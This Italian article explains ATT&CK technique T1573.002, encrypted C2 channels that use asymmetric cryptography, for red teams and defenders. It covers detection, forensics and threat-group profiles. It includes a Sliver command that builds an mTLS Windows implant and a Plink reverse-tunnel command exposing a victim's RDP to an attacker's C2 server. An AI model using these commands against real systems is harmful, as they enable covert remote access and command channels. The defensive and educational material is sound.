Crittografia Asimmetrica nel C2: Encrypted Channel – Asymmetric Cryptography (T1573.002)

La simulazione di un canale C2 con crittografia asimmetrica è uno degli scenari più rappresentativi di un red team engagement. L'obiettivo non è solo ottenere una shell, ma verificare se il SOC riesce a distinguere il traffico malevolo cifrato da quello legittimo.

Cobalt Strike (a pagamento) resta il riferimento industriale. Il profilo Malleable C2 permette di configurare certificati SSL personalizzati che imitano servizi legittimi. Per generare un listener HTTPS con certificato custom, si parte dal keytool di Java per creare un keystore, poi si associa al listener nella configurazione del team server. Il punto critico è il certificato: usare un certificato self-signed è facile da rilevare, mentre un certificato Let's Encrypt su un dominio plausibile alza notevolmente la barra di detection.

Sliver (open source) offre un'alternativa gratuita con supporto nativo per mutual TLS. Il framework genera automaticamente certificati per l'handshake, rendendo l'avvio di un impianto mTLS immediato:

sliver > generate --mtls --os windows --arch amd64 --save implant.exe

Per scenari più leggeri, Mythic (open source) supporta profili C2 con cifratura SSL configurabile. La sua architettura modulare consente di scegliere tra diversi agent — ognuno con le proprie capacità crittografiche.

Sul versante tunneling, Plink (open source, parte di PuTTY) è lo strumento che gruppi come Cobalt Group e FIN6 hanno realmente utilizzato per creare tunnel SSH verso i server C2. Il comando canonico per un tunnel reverse è:

plink.exe -ssh -N -R 8080:127.0.0.1:3389 utente@server-c2 -pw password

Questo crea un tunnel cifrato RSA/ECDSA che espone l'RDP della vittima al server dell'attaccante, esattamente la tecnica adottata da FIN8 per esfiltrare accessi desktop remoti.

Per la simulazione di malware che incorpora una chiave pubblica hardcoded — come fanno GrimAgent, SodaMaster e Woody RAT — è utile generare un keypair RSA con OpenSSL e cifrare i beacon di test:

openssl genpkey -algorithm RSA -out private.pem -pkeyopt rsa_keygen_bits:4096 openssl rsa -pubout -in private.pem -out public.pem

Il payload di laboratorio legge la chiave pubblica, cifra il payload di check-in con RSA-OAEP e lo invia al listener. Questo replica fedelmente il pattern di LunarWeb (RSA-4096) e Cobalt Strike (RSA con PKCS1 padding). L'ethical hacker deve documentare se l'IDS rileva l'handshake anomalo, se il proxy decifra il traffico e se il SIEM correla l'evento.

Il paradosso di questa tecnica è che l'attaccante usa esattamente gli stessi protocolli del traffico legittimo. Non puoi bloccare TLS, ma puoi cercare le anomalie nel come viene usato.

La prima linea di difesa è l'ispezione SSL/TLS. La mitigazione M1020 prescrive di posizionare appliance di decifrazione ai choke point della rete, con policy che decifrano il traffico verso destinazioni non categorizzate o a bassa reputazione, escludendo domini sensibili (banking, healthcare) per compliance. Una volta decifrato, il contenuto va inoltrato al SIEM e all'NDR per l'analisi.

Su Windows, la detection AN1496 si basa su Sysmon. Il segnale chiave è un processo insolito che carica librerie crittografiche come rsaenh.dll o crypt32.dll e poi apre connessioni TLS verso l'esterno. In pratica, si monitora EventCode 7 (Image Loaded) filtrando sui moduli crittografici, correlato con EventCode 3 (Network Connection) dallo stesso ProcessId. Il tuning è essenziale: bisogna costruire una whitelist dei processi legittimi — browser, client di posta, aggiornamenti software — e concentrarsi sulle eccezioni. Le catene di certificati anomale (self-signed, CA non riconosciute, certificati con validità breve) sono un secondo indicatore forte.

Su Linux, la detection AN1497 sfrutta auditd e osquery. Si tracciano le syscall di processi come bash o interpreti Python che linkano dinamicamente libcrypto o libssl e poi aprono socket verso IP esterni. Il rapporto di asimmetria del traffico — un client che invia molto più di quanto riceva — può indicare un beacon C2 piuttosto che normale navigazione web.

Per ESXi (AN1499), l'attenzione si concentra sui servizi hostd e vpxa che negoziano sessioni cifrate verso endpoint diversi da vCenter o dai repository di aggiornamento. La baseline degli host di management autorizzati è il punto di partenza.

A livello network (AN1500), la correlazione tra NetFlow/IPFIX e IDS che analizzano gli handshake TLS è fondamentale. Gli indicatori più affidabili sono: handshake su porte non standard, certificati con fingerprint sconosciuti, JA3/JA3S hash associati a framework offensivi noti. Tool come Zeek (open source) estraggono automaticamente i metadati TLS dal traffico senza decifrarlo, e il confronto dei JA3 hash con database pubblici di signature malevole è una detection ad altissimo rapporto segnale/rumore.

La mitigazione M1031 (Network Intrusion Prevention) completa il quadro: signature IDS/IPS per pattern noti di handshake di framework come Cobalt Strike o Sliver permettono di bloccare il traffico prima ancora che raggiunga l'endpoint.

L'analisi forense di un canale C2 cifrato con crittografia asimmetrica parte da un principio: il traffico è opaco, ma gli artefatti che lo circondano no. L'endpoint conserva tracce preziose sia della configurazione crittografica sia delle connessioni effettuate.

Su Windows, il primo artefatto da cercare è la chiave pubblica RSA hardcoded nel binario del malware. Tool come Detect It Easy (open source) o pestudio (freemium) identificano rapidamente l'uso di librerie crittografiche. Le stringhe estratte con strings o FLOSS (open source, di Mandiant) possono rivelare header PEM ("BEGIN PUBLIC KEY"), OID di algoritmi RSA o parametri di curva ellittica. Malware come Cyclops Blink combinano RSA con AES-256-CBC, quindi nel binario si troveranno sia la chiave pubblica sia le routine di generazione di chiavi simmetriche e IV casuali.

I log Sysmon sono fondamentali per ricostruire la cronologia. L'EventCode 1 (Process Create) mostra l'avvio del processo malevolo, l'EventCode 7 (Image Loaded) cattura il caricamento di rsaenh.dll e crypt32.dll, e l'EventCode 3 (Network Connection) documenta la destinazione del C2. La sequenza temporale di questi tre eventi, correlata per ProcessId e ProcessGUID, ricostruisce il momento esatto dell'attivazione del canale cifrato.

Il certificate store di Windows merita attenzione. Malware come LITTLELAMB.WOOLTEA ha riutilizzato la chiave privata del server web Ivanti Connect Secure compromesso, il che significa che la timeline deve includere anche l'analisi dei certificati installati e l'eventuale accesso anomalo al key store. Il registro di Windows sotto HKLM\SOFTWARE\Microsoft\SystemCertificates e gli eventi del log Microsoft-Windows-CAPI2/Operational documentano operazioni sui certificati.

Su Linux, auditd registra le syscall connect e socket con il contesto del processo chiamante. Se il malware usa OpenSSL — come fanno Mispadu, adbupd e OilBooster — la libreria condivisa libssl.so apparirà nella mappa di memoria del processo, recuperabile con cat /proc//maps su un sistema live o tramite analisi del memory dump. REPTILE, un rootkit kernel-level, usa TLS su TCP raw: in questo caso il forensic analyst deve cercare moduli kernel anomali con lsmod e verificare l'integrità con modinfo.

Per la ricostruzione di rete, i log Zeek (open source) sono ideali: il file ssl.log contiene server name, certificate chain, JA3 fingerprint e versione TLS di ogni connessione. Incrociando i JA3 hash con i timestamp di processo sull'endpoint, si chiude il cerchio tra artefatto host e artefatto network. I PCAP, anche se cifrati, conservano i metadati dell'handshake — il Server Hello, il certificato presentato e i cipher suite negoziati — tutti elementi che entrano nella timeline forense.

La crittografia asimmetrica nel C2 è trasversale a gruppi con motivazioni, target e sofisticazione molto diverse. L'analisi degli 11 gruppi documentati rivela pattern operativi distinti che aiutano a profilare le minacce.

APT42, attore legato all'Iran, impiega tool dedicati come NICECURL con C2 su HTTPS. Il focus su comunicazioni cifrate via protocolli web standard riflette un approccio orientato all'evasione in ambienti enterprise dove il traffico HTTPS verso servizi cloud è la norma. L'intelligence operativa su questo gruppo deve monitorare certificati e infrastrutture HTTPS associate alle sue campagne.

OilRig, altro attore iraniano, si distingue per l'uso di PowerExchange e tool custom per il tunneling verso i server C2. La creazione di tunnel cifrati, piuttosto che semplice HTTPS, indica un livello di sofisticazione che punta alla persistenza in reti segregate dove il traffico diretto verso l'esterno è limitato.

Il cluster cinese è particolarmente attivo. RedEcho ha utilizzato SSL nelle intrusioni contro le infrastrutture critiche indiane (campagna C0043, periodo 2021-2022), prendendo di mira utility elettriche e aziende logistiche. Velvet Ant adotta un approccio diverso con shell SSH reverse, privilegiando la sicurezza del canale bidirezionale. Tropic Trooper impiega SSL per le connessioni C2 in modo più convenzionale. La campagna Operation Wocao (C0014, 2017-2019), attribuita ad attori con sovrapposizioni con APT20, ha usato un proxy agent custom con upgrade a TLS — un livello di engineering che distingue operazioni di cyber espionage mature. La campagna APT41 DUST (C0040, 2023-2024) ha colpito settori come shipping, logistica e media in Europa, Asia e Medio Oriente usando HTTPS come canale C2.

Sul fronte finanziario, FIN6 e FIN8 condividono un pattern operativo interessante: entrambi utilizzano Plink per tunnel SSH, ma con finalità diverse. FIN6 crea tunnel diretti verso il C2, mentre FIN8 li usa specificamente per tunnelare sessioni RDP, suggerendo un focus sull'accesso interattivo ai sistemi compromessi. Cobalt Group segue lo stesso schema con Plink. Questa convergenza su un singolo tool legittimo per il tunneling è un indicatore utile per il threat hunting.

TA2541 rappresenta il segmento opportunistico: usa TLS con AsyncRAT, un RAT commodity, per campagne volumetriche. La semplicità dell'approccio — un malware off-the-shelf con cifratura TLS nativa — contrasta con gli impianti custom di gruppi come APT42 o RedEcho.

La campagna Versa Director Zero Day Exploitation (C0039, 2024) attribuita a Volt Typhoon merita attenzione particolare: lo sfruttamento di zero-day in appliance di rete con C2 su HTTPS rappresenta il trend emergente di attacchi alle infrastrutture di gestione, dove il traffico cifrato verso l'appliance è intrinsecamente legittimo e quindi ancora più difficile da rilevare.

Il trend complessivo mostra una progressiva sofisticazione: dal semplice SSL/TLS si passa a mutual TLS (come WellMess), a RSA-4096 con chiavi hardcoded (come LunarWeb e Woody RAT), fino ad algoritmi di nicchia come ECIES (REvil). Per l'intelligence officer, il cipher suite e l'implementazione crittografica diventano indicatori di attribuzione tanto quanto le infrastrutture di rete.

Framework MITRE ATT&CK: T1573.002, TA0011. Campagne: C0014 (Operation Wocao), C0039 (Versa Director Zero Day Exploitation), C0043 (Indian Critical Infrastructure Intrusions), C0021, C0040 (APT41 DUST). Mitigazioni: M1031, M1020. Detection: DET0543 (AN1496–AN1500). Integrato con conoscenza professionale per tool e procedure operative.